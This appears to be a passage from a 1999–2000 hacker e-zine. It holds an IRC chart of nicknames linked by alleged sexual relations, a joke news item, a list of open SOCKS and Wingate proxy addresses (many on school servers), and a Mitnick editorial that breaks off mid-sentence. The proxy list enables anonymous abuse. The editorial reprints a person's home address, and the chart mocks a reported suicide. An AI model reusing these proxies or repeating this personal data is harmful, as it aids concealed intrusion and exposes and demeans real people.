|||||| | | | .--- n0elle!@ | | onkeld badger || | | | ||
|||||| | | albatross .--' | || | | | | | || ajx --|-- mo ||
|||||| | | jsz | || `.| | littleone `-.|| .----|--. | ||
|||||`. `-|--. wing -------' |`---.||.--|------------ juliet --.| max-q ||
||||`-|-. | | mooks nts |||| `-. gfm --. | || | ||
|||`. | | | `------------|---|-- *fuz!* --|-------- morgen | looey | ||
||`-|-|-|-|-- kitkat^ ----|---|----'||`----|- lesb0 -|--|---|---. | ||
|| | | | | | | || | | | | luq | ||
|`--|-|-|-|---------------|---|-----'| dangergrl earle | | | ||
| | | | | sparxx --- l0ra!@ ----' | | | | | scorpion | ||
| `-|-|-|---------------'|| || slawz | | WIL WHEAT0N | | | ||
| | | | dt --'| |`----------|--|--------. | sfuze | ||
| | | | .--' | .---' oghost mchemist --' | ||
| | `-|--------------|----|-------|---------------' | | ||
| | `--------------|--- theejoker zens -- skinflower suiciety | ||
| | rosieriv -- tfish | | | | | | ||
| | | | `-----. quagmire | monachus -|-|-- daud | ||
| | | chlamydiarose | | | | | | ||
| `------|---. | | nekkidamy polymorf `---. | .'.'|
| .-- gheap | Zomba_Soul isis --------|---|------------|-|------|-|-'
| | | .--- q | | | | | |
| | | acronym | | | syndrome | |.-----' `-.
| torquie ------|-- countzero | | | | | | || plexor |
| | | | *thepublic* | | | || | |
`--|----|--------|-- theora -- RAgent | | | | | || | |
ludi dispater | | | rainbow lust!@@# --' |
`--------|----|-- dildog -- ladyada .--|-----' | | |||| | |
phen bopeep | .-|--|--- *maq* -. | |||| netmask -'
.---|------' | | montel --. .-------|-|--|-----' | | | |||`-|--------.
| el_jefe ---|-|-------- Heather sami | | .-----|---|-' ||| | |
| | | | | | | | .---' | ||| | cal |
| Mika tari --|-|-- dan_farmer .-- *pill* | | | vamprella ||| | | |
| `-. | | | | .----|--|-|-|---|-------'|`. | Er1s |
| val -- shipley -- muffy demonika --|--' | | purpcon | | | | |
| | || | | | .-'| |||| .-' .-' | .---|-|-|-' JonM |
| karrin --'| | danea mycroft | |||`-|--. | .-|-- kel -|---|-|-' | |
| | | | | | ||| | lizzie | .-' | | | | JiJi |
| CGD -- jen `-|--- banshee | | ||| | | | | | gh0st --|-|------' |
`---------------|------------' | ||| | | sage | `--. .--' `-. shaedow
Astaroth | wraith --|--'|| `-|------|----|----|-----.| | |
| | | | |`----|------|-- *disorder* wednesday |
DangerJen .--- se7en t | `-----|------|----|-|-|---------' |
| | | `---. | onyx -- furie | | | blaise -- skippy |
msk ---' simunye pandora `---|------------|----|-|------------------'
||| michelle ----|----' yt -- panther_modern
||`---------------------------------. .---|---------------.
|| .--------------------------- fizzgig --|-- rubella |
|`----|-------------------------. | | | | |
Imperia | deadgirl | | | | | |
| | lethar ----------. |.-|--|---|-|---' neologic |
Asmodeus | | | | || | | | `---. | |
.--' | | | valeriee Mali netik -|-----|-- mayfair | Kalannar
| Sinja | | | | | | | | |
| | Xaotika StVitus | | | fishie -- Missa | E_D |
| | | | | | | | |
| outside -- emmie Frobozz | | belial --- Uadjit -- solomon -- Mottyl
| | | | | | | | | | |`---.
| rebrane | Murmur_gth | | | |.---------|-' Grue --|--|-- moomin13
| | | | | | | ||.--------|-----' | |
`--------|------|---------|-- gothbitch! -------|-----------' Fiore --.
JelloMold *bifrost* `--. | ||`---------|--------------'| |
| `----- aex |`--- pahroza -- anubis MartYr |
bile -- turtlgrl --------|----|------' | | |
inox Miah secretboy Arkham Stipen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
hydro311 Starr angieb am0eba -- spyder_bytes thepublic -- rage
| | |
Chef -- meenk ---- gweeds tigerbeck -- bifrost disorder -- kamira
| | |
fuz B00bz magpie pinguino -- pill maq -- apok0lyps
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
"the big loop" is over 800 people! holy crap!
work for the chart.
the top rankings:
----------------
#1 winner -- pinguino & gweeds -- 21 links! it's a tie!
#2 winner -- meenk -- 19 links!
#3 winner -- crank -- 18 links!
#4 winner -- xgirl -- 15 links!
#5 winner -- n0elle & sQurl -- 13 links! it's a tie!
honorable mention:
-----------------
12 links: gothbitch, ophie, GoNINzo, Wayhigh, & phyzzix!
11 links: murmur, evol, lust, Mikey, & fuz!
10 links: pip, & tigerbeck!
9 links: metalchic, Kaleid, hillary, y-windows, fuz, hitchcock, demonika,
& l0ra!
be a winner *today*!
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
unconfirmed links:
these are links i've been told more than twice to add, but have then been
told by others to remove once they're on the chart. each link stays for
six months, & if no one can prove it's valid in that time, it is
removed & assumed untrue.
if you bore witness to one of these links or know someone who did, mail
crank@ice.net with your confession!
(no unconfirmed links at this time.)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
notable gross things on the chart:
this is a section for easy reference to family members on the chart. the
end people are the relation as noted. if you know two people on the big
loop are in the same family, mail crank@ice.net & let us rejoice in the
incest!
tigerbeck -- aries99
1 link: siblings
spirit -- hillary -- seth -- candyrain
3 links: siblings
pixy -- gweeds -- jess -- andrew -- mswicked
4 links: siblings
blueeyes -- 8ball -- crank -- aoxomoxoa -- poppie -- donnie
5 links: siblings
art -- seaya -- kaia -- murmur -- sonia -- plexus
5 links: siblings
potter -- scat -- bF -- evol -- styx
4 links: cousins
christy -- kkrazy -- kinessa -- gweeds -- LCN -- tanadept
5 links: stepsiblings
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#2600:
lashtal
|
empress deadguy | maverick
| | | |
sin ----- speck -- liquid_motion
| |
beastly -- c4in d_rebel
kspiff -- mimes -- dieznyik -- nelli
|
borys -- zebby (#bodyart)
LdyMuriel Erato flutterbi chexbitz
`---. | .---' |
Kalika -- IceHeart -------------- virago -- mre
|| | | |
Berdiene --'| | Pyra -- Roamer ewheat
| `---------.
Serenla --' roach -- satsuki -- spinningmind
kitiara -- starlord
anarchy -- aphex twin
soul seeker -- educated guess
tempus thales -- lady in black -- midnight sorrow
magnatop -- darice
jandor -- alexis ryna
illusionx -- thumper
javaman -- nrmlgrl
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
bodyart [#bodyart/#bodypiercing/#tattoo]:
ga[r]y
| |
xindjoo -- grrtigger -- bone-head
| |
FreAkBoi -- psychoslut -- timo
heidikins -- pasquale
grub -- gypsie
tabaqui -- catbones -- sprite
ministry -- SuperMia -- superdave
bert37 -- chiot
steppah -- creeper
syx66 -- gypsy_whore
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#coders:
simon -- wolfie -- raphael (#trax)
bolt -- ashli
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#ezines:
sirlance -- holly -- hardcore
|
rattle -- s4ra -- doommaker
phairgirl -- M4D_3LF -- amanda -- unrelated -- effy -- BigDaddyBill
| |
pixieOpower
spiff -- tl109
figglemuffinz -- creed
ilsundal -- fairy_princess
vanir -- darkland
snarfblat -- d1d1
dimes -- bexy -- mindcrime
tut -- casey
pezmonkey -- cptbovine
greyhawk -- crazybaby
cheesus -- meowkovich
catbutt -- pulse
ygraine -- drool
bigmike -- shana
camel -- icee
UberFizzGig -- kniht -- wadsworth
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#hack:
t0c -- seussy -- o0
|
taner
glyph -- adnama -- weaselboy -- vein -- montell
| |
m0rticia
shamrock -- jennicide -- efpee -- imposter-dh
|
bellum
radikahl -- jazmine -- gitm
t3kg -- elfgard
pluvius -- lydia
panic -- plant -- erikt
sl33p -- molldoll
allman -- costales
rhost -- sue_white
serpent -- no_ana
vaxbuster -- tiggie -- redragon
ajrez -- luminare -- m0jo
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#mindvox:
killarney -- tomwhore -- fairosa -- kids
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
misc:
MsLePew -- Beacher
sangfroid -- inspektor
foo -- leeny
HippieEB -- Imaj
mskathy -- strahd
plutonium -- pixiedust
cnelson -- vanessa
Hawkerly --- MeaNKaT --- Morpheus
Vega1 -- Serena
DIPTY_DO -- Trish_ -- hellsnake
Grace^ -- Gusto -- puckie
notyou -- jennyh
Skada -- icee_bin -- eriss
doogie -- sarahlove
kirby-wan -- cybergirl
lurid -- deb -- bmbr
j-dog -- a_kitten
Fenchurch -- Becca
captain_zap -- ms_infowar
jaran -- duke
chs -- princess
ndex -- illusions
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
music [#punk/#ska/#sxe]:
solaris -- kojak -- chelsea -- pieskin -- lady rude
|
kcskin -- janew
|
kamaskin -- kimee -- dano
joojoo nes
| |
auralee -- konfuz -- subgurl -- danx -- starla
| |
kathy21 alee
mutata -- skidman
shellskin -- amberskin
astrophil -- maggiemae
skarjerk -- pancreas
prick -- taxie -- jubjub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#seattle:
nitefall bgh -- superlime -- Shill -- Lizsac fimble
| | |
juice -- e1mo -- shane -- aeriona -- Justnsane -- koosh -- tcb
clarita -- dataangel
wyclef -- NessaLee
Drmc -- Jill-
SisSoul -- Matt
Dawgie -- Jenay
jsk -- ames
Liz -- jkowall
kurgan -- babygrrl
Mcbeth -- BeccaBoo
djinn -- ruthe
wankle -- carrianne
hamilton -- nurit
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#skate:
kindje -- tigerkat -- huphtur -- superzan
|
punkgirl -- yakuza -- maryjane
|
caroline -- rhy
cosmo cks lodias
`--. | .--'
outlander -- spike -- lightborn
.--'|||`--.
darkelf ||| weevil
|||
tenchi --'|`-- h0ly
[r]
katskate -- earwax
vlinder -- miesj
superfly -- conchita -- nobaboon -- no_fievel
p4nacea -- bakunin
herculez -- nicki
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#trax:
cardiac sandman -- trissy skie -- necros
| | |
saxy -- vegas basehead
| | |
kiwidog fassassin -- discodiva
gblues
|
squeep -- qporucpine -- ami -- dilvish
higherbeing -- ms_saigon -- floss
| |
howler vizz
mellow-d -- kisu -- snowman -- trixi
|
megz
lowrider -- lum -- perisoft
mickrip -- astrid -- draggy -- leece
pandorra -- malakai
ozone -- bliss
animix -- pixie
lummy -- daedalus
frostbitten_dream -- pickl'ette -- redial
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#twilight_zone:
revneptho dtm Frizz0 Wireless
`----.| .---' |
h0lydirt --- nina -- zbrightmn -- halah
.--'| `---. |
dog3 | whistler RockShox
|
chilly
joeN -- daysee -- evil_ed -- linnea
|
munchie
Loverman -- Missi
redbird -- reddy
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#unix:
in4mer -- devilgrl
gerg -- tyger
chloe -- cosmos
dem -- webb
callechan -- rhiannon
RealScott -- Ila
supertaz -- skye
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
revision history -- last updated 7-28-99
v9.04: added belial, f_fisher, Murmur_gth, bix, DJTrax, kamira, Heather,
phen, montel, monachus, Schquimpy, Nex, phreaky, Sylvie, Katia,
banshee, PointBlank, & RaggedyAnne.
added magpie, hydro311, kamira, disorder, apok0lyps, maq, rage,
& thepublic to the secondary chart.
(if anyone has an alternate nick for the #gothic Murmur, please mail
me. i used the nick Murmur_gth for now.)
added misc gh0st group to the big loop.
gweeds moves up to winner 1.
meenk moves up to winner 2.
gothbitch moves up to honorable mention 12.
renamed Listener to alecks.
renamed illuminaeti to luminare.
renamed zines category to #ezines.
added phairgirl -- pixieOpower -- M4D_3LF -- amanda to #ezines.
added amanda -- unrelated -- effy -- BigDaddyBill to #ezines.
added jennicide -- bellum to #hack.
added luminare -- ajrez to #hack.
added to misc:
deb -- bmbr
j-dog -- a_kitten
Fenchurch -- Becca
captain_zap -- ms_infowar
deb -- lurid
jaran -- duke
chs -- princess
ndex -- illusions
removed one outdated "unconfirmed link".
removed miasma -- six from unconfirmed. oops.
removed bogus links:
t -- gf -- lilfeet
Quarex -- keroppi
new links:
fizzgig -- (solomon, Asmodeus, fishie, belial)
Grue -- gothbitch -- Asmodeus
gothbitch -- belial -- Uadjit
METchiCK -- (f_fisher, grimmy, deadapril, supervixn)
kel -- (disorder, lizzie, gh0st)
corp -- gweeds -- magpie
aex -- Murmur_gth
eppie -- bix
styx -- DJTrax
meenk -- hydro311
halfman -- sumogirl
disorder -- kamira -- apok0lyps -- maq -- Heather -- montel
el_jefe -- (Mika, phen, Heather)
daud -- monachus
amos -- velcro
Schquimpy -- (trilobyte, EddieV, Nex)
splat -- phreaky
Sylvie -- neko -- Katia
shipley -- banshee
thepublic -- rage
hylonome -- PointBlank -- RaggedyAnne
hylonome -- RaggedyAnne -- Quarex
v9.03: added deadgirl, Gemni, DrMonk, AK47, monkeygrl, Miah, grlfrmars,
wildcard, spectacle, kev-man, bile, chinagirl, rubella, Arkham,
Uadjit, fishie, solomon, moomin13, Grue, Missa, Mottyl, Kalannar,
E_D, Fiore, MartYr, & Stipen.
added angieb to the secondary chart.
updated number of people in the big loop.
gweeds moves up to winner 2.
meenk moves up to winner 3.
gothbitch moves up to honorable mention 9.
added miasma -- six to unconfirmed.
added zines The_Sock group to the big loop.
added zines AnonGirl group to the big loop.
added javaman -- nrmlgrl to #2600.
added satsuki -- (IceHeart, roach, spinningmind) to #2600.
added doogie -- sarahlove to misc.
added kirby-wan -- cybergirl to misc.
added shane -- aeriona to #seattle.
added to #trax:
skie -- necros
astrid -- draggy
ms_saigon -- vizz
snowman -- megz
removed bogus links:
mailart -- konfuz (mailart = nes)
new links:
DH -- Gemni -- DrMonk
meenk -- AK47
gweeds -- angieb
AIDS -- caitlin
deadgirl -- Mali -- maq
logicbox -- monkeygrl
Fiore -- gothbitch -- Miah
grlfrmars -- (mogel, wildcard, spectacle, kev-man)
turtlegrl -- bile
trilobyte -- chinagirl
fizzgig -- rubella
anubis -- Arkham
swisspope -- AnonGirl
pahroza -- Uadjit -- solomon -- moomin13 -- Grue
Fiore -- solomon -- gothbitch -- Uadjit -- fishie -- Missa
Mottyl -- (solomon, Kalannar, E_D)
MartYr -- Fiore -- Stipen
v9.02: added rebrane, Xaotika, valeriee, JelloMold, neologic, amos, EddieV,
Roadruner, TAYL0R HAWKINS, MINNIE DRIVER, secretboy, kel, nevre,
freqout, krnl, skatin, Sinja, Frobozz, & hawk.
gweeds moves up to winner 2.
meenk moves up to winner 3.
sQurl moves up to winner 6.
metalchic moves up to honorable mention 9.
renamed cannianne to carrianne.
added to misc:
Hawkerly --- MeaNKaT --- Morpheus
Vega1 -- Serena
DIPTY_DO -- Trish_ -- hellsnake
Grace^ -- Gusto -- puckie
notyou -- jennyh
Skada -- icee_bin -- eriss
(special note: eriss was dumped for Skada & subsequently leapt
to her death from a nineteeth story window. neat!)
added to #zines:
nico -- anjee -- meethos -- METchiCK -- The_Sock -- ^mindy^
meethos -- Alucard -- The_Sock -- kitn -- ILUVJeNNA
MrJuGGaLo -- METchiCK -- facedown
caitlin --- wmmr --- coffeegrl
AnonGirl -- Medusa -- PrimeX -- Juliette
removed bogus links:
emmie -- (netik, msk, Herodotus)
billn -- Tay -- retrospek
mayfair -- outside
Mali -- (Asmodeus, pahroza, Uhlume, Imperia)
new links:
emmie -- rebrane -- JelloMold
Xaotika -- lethar -- valeriee
mayfair -- neologic
trilobyte -- amos -- EddieV -- sonia
sQurl -- Roadruner
Tay -- TAYL0R HAWKINS -- MINNIE DRIVER
anubis -- secretboy
netmask -- kel
meenk -- nevre
gweeds -- freqout
missx -- krnl
metalchic -- skatin
Imperia -- Asmodeus -- Sinja
turtlgrl -- pahroza -- gothbitch -- Mali -- lethar
fizzgig -- msk
gothbitch -- Frobozz
darwin -- hawk
v9.01: added tamago, atticus, lilindian, martyn, aries99, ryshask, timmerca,
twichykat, soulvamp, mysl, fizzgig, lethar, anubis, & inox.
added tigerbeck & bifrost to the secondary chart.
updated number of people in the big loop.
new "gross link":
tigerbeck -- aries99 (1: siblings)
gweeds moves up to winner 3.
tigerbeck moves up to honorable mention 10.
added FreAkBoi -- psychoslut -- timo to #bodyart.
added supertaz -- skye to #unix.
removed one outdated "unconfirmed link".
removed bogus links:
juliet -- readwerd
FreAkBoi -- ga[r]y (#bodyart)
Briana -- homeysan
new links:
seaya -- tamago
_Melody_ -- atticus
DrkSphere -- lilindian
tigerbeck -- (aries99, martyn, ryshask, timmerca, soulvamp)
tigerbeck -- (allira, twichykat, spacegirl, bifrost)
gweeds -- mysl
msk -- DangerJen -- Astaroth
outside -- mayfair
netik -- fizzgig
emmie -- lethar
pahroza -- anubis
aex -- inox
v9.00: i was going to do something special for 9.00, but there just isn't
anything to do. would you people be interested in sexchart
tshirts? mail crank@ice.net.
note to webmasters - it's not sexchart.8 anymore - sexchart.txt. be
sure to update your links.
added NeuralizR, vlaad, pahroza, Imperia, Mali, Uhlume, StVitus,
Herodotus, & Asmodeus.
added am0eba, & spyder_bytes to the secondary chart.
added netik & Mali sections to the big loop.
added new section: #seattle.
moved e1mo links to #seattle.
moved koosh -- tcb to #seattle.
moved clarita -- dataangel to #seattle.
added chexbitz -- virago -- ewheat to #2600.
added Astaroth -- DangerJen to #gothic.
added plutonium -- pixiedust to misc.
added cnelson -- vanessa to misc.
added to #seattle:
wyclef -- NessaLee
Drmc -- Jill-
SisSoul -- Matt
Dawgie -- Jenay
jsk -- ames
Liz -- jkowall
bgh -- superlime -- Shill -- Lizsac
fimble -- koosh -- Justnsane -- aeriona -- superlime
kurgan -- babygrrl
Mcbeth -- BeccaBoo
djinn -- ruthe
wankle -- cannianne
hamilton -- nurit
added halah -- Wireless to #twilight_zone.
removed one outdated "unconfirmed link".
removed bogus links:
e1mo -- chris22 (#seattle)
loki -- am0eba -- sledge
missx -- (sledge, erikb, ice9)
Briana -- nebulizr
logicbox -- skully
murcurochrome -- jazmine -- deadkat (#hack)
new links:
am0eba -- spyder_bytes
Briana -- (NeuralizR, bumble, nettwerk, homeysan, tsal)
teletype -- vlaad
netik -- msk -- emmie -- outside
aex -- bifrost -- emmie -- netik
emmie -- Herodotus
bifrost -- turtlgrl
Imperia -- msk
Mali -- (Uhlume, Imperia, Asmodeus, StVitus, pahroza)
@HWA
05.0 Peer finally arrested after over a decade of connection resetting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.ircnews.com/
(Humour, in case you didn't know a common connection error is
"connection reset by peer" caused by errors in the network and on
occasion a DoS attack on your IRC connection... ;) - Ed)
Peer Arrested, Charged With Resetting Connections
SEATTLE, WA - An exhaustive eight month cyberhunt
ended shortly before dawn on January 14th, 2000, as FBI
agents and Washington State Troopers apprehended the
elusive chatroom terrorist known only as Peer.
The IRC menace was brought to justice after a
decade-long connection resetting spree that plagued
chatters around the globe. FBI officials said the number of
reset connections numbered in the "millions".
Connections being reset by peer were the number one
cause of interupted chat sessions on all major IRC
networks in 1999.
Undernet ChanServ Committee member Morrissey told
IRCNews.com, "What set peer apart was the element of
suprise. With ping, you kinda knew you were gonna time
out. You could tell. Peer totally got you out of nowhere."
Leland, another bigshot on the Undernet IRC network,
praised the FBI for their work, "How many idle times must
be ruined? How many cybersex sessions must be cut
short before we put an end to Peer and his shinanigans?"
Peer's lawyers criticized Leland's use of the word
"shinanigans".
Peer's lead defence attorney responded, "Really, I think
we can come up with a better term than that. We're all
adults here. Besides, it's 'alleged' shinanigans."
Federal Prosecutor Sarah Evans told IRCNews.com she
intends to "throw the book" at Peer. If convicted on all
counts, Peer could spend up to the next three years on
probation.
"His ass is mine.", claimed a motivated Evans. "With any
luck, we'll get that judge who handled the Mitnick case."
@HWA
06.0 Updated proxies list from IRC4all
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.lightspeed.de/irc4all/
Socks 4 proxies:
~~~~~~~~~~~~~~~~
NotFound 200.248.68.129
NotFound 200.36.19.225
NotFound 195.5.52.154
ch-angrignon.qc.ca 207.236.200.66
m105.clic-in.com.br 200.231.28.15
NotFound 195.42.150.129
www.quicktest.com 12.8.210.132
internet-server.ebf.com.br 200.231.27.1
wk135.dnr-inc.com 216.62.50.135
122-94.w3.com.uy 207.3.122.94
mail.theova.com 195.14.148.65
mercury.knowlbo.co.jp 210.160.144.146
igic.bas-net.by 194.85.255.49
cr216724724.cable.net.co 216.72.47.24
zakproxy.alexcomm.net 163.121.219.62
proxy.quicktest.com 12.8.210.130
NotFound 195.14.148.101
NotFound 210.237.181.226
zskom.vol.cz 212.27.207.7
tsp-proxy.tsss.com 12.2.81.50
proxy.utvlive.com 194.46.2.34
news.ukrnafta.ukrtel.net 195.5.22.196
pcse.essalud.sld.pe 200.37.132.130
dns-server1.tj.pa.gov.br 200.242.244.1
cr216724718.cable.net.co 216.72.47.18
NotFound 194.85.255.117
NotFound 195.42.150.132
NotFound 212.22.69.35
patter.lnk.telstra.net 139.130.81.160
nic-c49-067.mw.mediaone.net 24.131.49.67
NotFound 206.112.35.146
ts18.svamberk.cz 212.47.11.231
NotFound 212.68.162.183
NotFound 194.204.206.139
mars.sos.com.pl 195.117.212.4
mail.ermanco.com 12.2.82.130
www.ukrnafta.ukrtel.net 195.5.22.195
39.volgaex.ru 194.84.127.39
NotFound 194.243.99.199
www.cassvillesd.k12.wi.us 216.56.42.3
34.volgaex.ru 194.84.127.34
pc-gusev3.ccas.ru 193.232.81.47
xl2.cscd.lviv.ua 195.5.56.1
modemcable161.21-200-24.timi.mc.videotron.net 24.200.21.161
tconl9076.tconl.com 204.26.90.76
jm1.joroistenmetalli.fi 194.137.219.130
jovellanos.com 194.224.183.221
ns.ticketport.co.jp 210.160.142.82
plebiscito.synapsis.it 195.31.227.14
NotFound 194.243.99.162
NotFound 194.204.205.93
NotFound 212.205.26.80
NotFound 210.56.18.228
h0000e894998c.ne.mediaone.net 24.128.161.28
NotFound 198.162.23.185
www.sos.iqnet.cz 212.71.157.102
ns.terna.ru 212.188.26.67
NotFound 206.103.12.131
NotFound 203.116.5.58
207-246-74-54.xdsl.qx.net 207.246.74.54
adsl-63-196-81-8.dsl.sndg02.pacbell.net 63.196.81.8
glennsil.ne.mediaone.net 24.128.160.74
dns.hokuto.ed.jp 210.233.0.34
210-55-191-126.ipnets.xtra.co.nz 210.55.191.126
relectronic.ozemail.com.au 203.108.38.61
sai0103.erols.com 207.96.118.243
frontier.netline.net.au 203.28.52.160
210-55-191-125.ipnets.xtra.co.nz 210.55.191.125
NotFound 212.68.162.177
216-59-41-69.usa.flashcom.net 216.59.41.69
mail.medikona.lt 195.14.162.220
NotFound 195.14.148.99
proxy1.israeloff.com 206.112.35.156
NotFound 195.14.148.98
NotFound 195.14.148.97
mail.trutnov.cz 212.27.207.8
sripenanti01-kmr.tm.net.my 202.188.62.6
c111.h202052116.is.net.tw 202.52.116.111
NotFound 195.14.148.100
nevisco.city.tvnet.hu 195.38.100.242
ipshome-gw.iwahashi.co.jp 210.164.242.146
216-59-40-227.usa.flashcom.net 216.59.40.227
NotFound 212.47.11.130
216-59-40-72.usa.flashcom.net 216.59.40.72
altona.lnk.telstra.net 139.130.80.123
burnem.lnk.telstra.net 139.130.54.178
edtn004203.hs.telusplanet.net 161.184.152.139
ns.ukrnafta.ukrtel.net 195.5.22.193
edtn002050.hs.telusplanet.net 161.184.144.18
nic-c40-143.mw.mediaone.net 24.131.40.143
gk8-206.47.23.149.kingston.net 206.47.23.149
dns.rikcad.co.jp 210.170.89.210
dsl-148-146.tstonramp.com 206.55.148.146
52-012.al.cgocable.ca 205.237.52.12
216-59-38-142.usa.flashcom.net 216.59.38.142
dns1.ctsjp.co.jp 210.172.87.146
52-061.al.cgocable.ca 205.237.52.61
edtn003590.hs.telusplanet.net 161.184.150.34
modemcable215.2-200-24.hull.mc.videotron.net 24.200.2.215
Socks 5 proxies
~~~~~~~~~~~~~~~
NotFound 195.5.52.154
NotFound 168.187.78.34
NotFound 210.56.18.228
NotFound 200.241.64.130
NotFound 206.112.35.146
NotFound 194.243.99.162
NotFound 194.243.99.199
garrison-grafixx.com 216.36.30.76
internet-server.ebf.com.br 200.231.27.1
pc-gusev3.ccas.ru 193.232.81.47
mail.clintrak.com 206.112.35.178
NotFound 195.146.97.178
ns.wings.co.jp 210.168.241.106
wk135.dnr-inc.com 216.62.50.135
ts18.svamberk.cz 212.47.11.231
jm1.joroistenmetalli.fi 194.137.219.130
morris.ocs.k12.al.us 216.77.56.74
c111.h202052116.is.net.tw 202.52.116.111
relectronic.ozemail.com.au 203.108.38.61
jovellanos.com 194.224.183.221
oms.ocs.k12.al.us 216.77.56.106
ntserver01.thomastonschools.org 209.150.52.114
port58151.btl.net 206.153.58.151
mail.medikona.lt 195.14.162.220
chester.chesterschooldistrict.com 12.6.236.250
NotFound 206.103.12.131
p5.itb.it 194.243.165.21
NotFound 194.226.183.34
nic-c49-067.mw.mediaone.net 24.131.49.67
south.ocs.k12.al.us 216.77.56.90
NotFound 195.146.98.226
cr216724718.cable.net.co 216.72.47.18
north.ocs.k12.al.us 216.77.56.66
dns.hokuto.ed.jp 210.233.0.34
linux.edu.vologda.ru 194.84.125.217
proxy.utvlive.com 194.46.2.34
ibp.santa.krs.ru 195.161.57.133
dns.rikcad.co.jp 210.170.89.210
207-246-74-54.xdsl.qx.net 207.246.74.54
jeter.ocs.k12.al.us 216.77.56.98
carver.ocs.k12.al.us 216.77.56.114
ohs.ocs.k12.al.us 216.77.56.122
wforest.ocs.k12.al.us 216.77.56.82
dns1.ctsjp.co.jp 210.172.87.146
edtn003590.hs.telusplanet.net 161.184.150.34
edtn004203.hs.telusplanet.net 161.184.152.139
165-246.tr.cgocable.ca 24.226.165.246
216-59-41-69.usa.flashcom.net 216.59.41.69
Wingates
~~~~~~~~
NotFound 210.56.18.228
NotFound 206.103.12.131
port58151.btl.net 206.153.58.151
NotFound 200.241.64.130
wk135.dnr-inc.com 216.62.50.135
cr216724718.cable.net.co 216.72.47.18
dns.hokuto.ed.jp 210.233.0.34
dns.rikcad.co.jp 210.170.89.210
altona.lnk.telstra.net 139.130.80.123
burnem.lnk.telstra.net 139.130.54.178
52-061.al.cgocable.ca 205.237.52.61
proxy.utvlive.com 194.46.2.34
207-246-74-54.xdsl.qx.net 207.246.74.54
edtn002050.hs.telusplanet.net 161.184.144.18
dns1.ctsjp.co.jp 210.172.87.146
edtn004203.hs.telusplanet.net 161.184.152.139
mars.sos.com.pl 195.117.212.4
165-246.tr.cgocable.ca 24.226.165.246
Other proxies available, check the site for more/updated lists.
@HWA
07.0 Rant: Mitnick to go wireless?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Editorial, by Cruciphux
Jan 23rd 2000
Finally the long awaited release of ueber hacker Kevin Mitnick has
arrived, he was released Friday Jan. 21st in the morning and is not
allowed to touch computers or cellular phones for a period of three
years without express permission of his probation officer.
Kevin holds out one hope though, earlier in his 'carreer' Kevin was
an avid amateur radio operator and his license recently expired, he
is reportedly scrambling to obtain a new one. This poses some very
interesting questions, will he be allowed to operate his HAM equipment?
Packet Radio
For those not in the know myself and several HWA members are also
HAM operators, most of us got hooked by the prospect of a technology
called "packet radio". The internet runs on a protocol known as X.25
packet radio uses a similar methodology known as AX.25, the "A" denotes
"A"mateur. We're some of the few people that have actually IRC'ed
using a packet radio link to a unix server over the 2m band, but of
course this requires a computer and additional computer equipment hooked
to the radio gear necessary to run packet, what if we forget all that
since it is out of Kevin's reach to own a computer at this time and look
at what other 'trouble' he can get into.
Repeater Nets and the Autopatch
The radios of choice these days among young hams are dual band HT's (short
for handy-talky or 'walky-talkie') these will usually cover the 2m band
and the 440 cm bands, the 2m band by itself is the most common band in use
and operates a great deal using repeaters. A repeater can be compared to
a cell site insomuch as it takes a weak signal (the HT, generally 100mw to
4 watts in power, much like small cell phones) and REPEATS or re-broadcasts
on another (close) frequency a stronger signal, thus reaching greater
range. With special DTMF codes it is possible to LINK repeaters and talk
across the country using repeater nets.
Whats so great about this?, apart from the obvious ability to talk to people
long distances for little to no cost, many repeaters have the magic box
known as an AUTOPATCH. The autopatch is a computer interface at the repeater
site that interfaces your radio signals with a TELCO line. (aha!). Yes
many hams enjoy the priviledges (minus obvious privacy and anonymity) of
'cellular' or 'radio phone' useage for minimal cost. For a GOOD radio you
are looking at an investment around $500 and for a HAM club membership
(to get all the repeater and autopatch codes etc) you're looking at around
$15/year or you can find the codes posted in many places on the web.
Caveats / privacy
The airwaves are 'public property' and as such are regulated (for our own
good of course) by big brother, that being the FCC in the U.S.A or DOC in
Canada. When you pass your licensing test (minimal proficiency in electronics
and general radio theory must be demonstrated via written test) you will be
assigned a unique CALL SIGN (in some places you can request a custom/vanity
sequence but will be allocated a random unused call if your request is being
used). Since the airwaves are public property, so are the records of those
users that are licensed to broadcast on them. Several online databases exist
or can be purchased cheaply on CDROM with many search features like search by
name, call address, partials etc... in this case a simple search on the QRZ
website (http://www.qrz.com/) in the OLD database for "Kevin Mitnick" returns
several possible matches, among them the correct one which is listed below.
--------------------------------------------------------------------------
Callbook Data for N6NHG
The following information is taken from the March 1993 QRZ Ham Radio
Callsign Database. This is not the current information for this callsign.
Click on the underlined callsign to see the latest information for this
record.
Callsign: N6NHG
Class: General
Name: KEVIN D MITNICK
Effective: 12 Dec 1989
Expires: 12 Dec 1999
Address: 14744 LEADWELL ST
City/State: VAN NUYS CA 91405
--------------------------------------------------------------------------
We can safely assume this is correct since the initials (KDM) are right and
the location matches up along with the license renewal date of 12/12/99.
Shennanigans
How does Kevin fit into all this? well as you can see, it is possible to
